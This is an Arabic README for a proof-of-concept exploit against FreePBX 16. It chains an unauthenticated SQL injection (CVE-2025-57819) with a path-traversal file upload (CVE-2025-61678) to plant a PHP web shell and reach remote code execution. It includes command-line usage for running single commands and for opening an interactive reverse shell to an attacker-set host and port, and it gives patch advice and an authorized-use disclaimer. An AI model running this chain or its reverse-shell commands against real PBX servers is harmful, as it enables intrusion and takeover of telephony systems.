
إثبات مفهوم لاستغلال يربط بين حقن SQL غير مصادق عليه مع اجتياز مسار مصادق عليه لتحقيق تنفيذ تعليمات برمجية عن بُعد على FreePBX 16. يدعم الأوامر الفردية وصدفات عكسية تفاعلية.
إثبات مفهوم لاستغلال يربط بين ثغريتين في FreePBX للوصول من دخول صفري إلى تنفيذ أوامر عن بُعد على FreePBX 16.
| CVE | المكون | التأثير |
|---|---|---|
| CVE-2025-57819 | مُحمّل وحدة النقاط الطرفية (مُعامِل brand) | حقن SQL مُكدّس غير مصادق عليه |
| CVE-2025-61678 | رافع البرامج الثابتة لمدير النقاط الطرفية (مُعامِل fwbrand) | رفع ملف تعسفي مصادق عليه (تجاوز المسار) |
ampusers.../../../var/www/html/<dir> في fwbrand لكتابة شِلّة PHP في جذر الويب.FreePBX 16 (وحدة النقاط الطرفية قبل الإصدار 16.0.92). تم التصحيح أيضًا في 17.0.6.
قم بالتحديث إلى إصدار تم إصلاحه.
# single command
python3 exploit.py --rhost pbx.example.com --command "id"
# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
pip install requests pwntools
للاستخدام في الاختبارات الأمنية المصرح بها والأغراض التعليمية فقط. استخدمه حصريًا على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.
FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · حقن SQL غير مصادق عليه · حقن استعلامات مُكدّسة · وحدة النقاط الطرفية · مدير النقاط الطرفية · رفع ملفات مصادق عليه · تجاوز المسار · تنفيذ أوامر عن بُعد · RCE · PoC · استغلال · أمن VoIP
linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb
| العَلَمة | الوصف |
|---|
--rhost | الخادم الهدف (مطلوب) |
--rport | منفذ الهدف (افتراضي 443) |
--http | استخدام HTTP بدلاً من HTTPS |
--lhost / --lport | عنوان ردّ شِلّة عكسية |
--command | تشغيل أمر واحد بدلاً من شِلّة |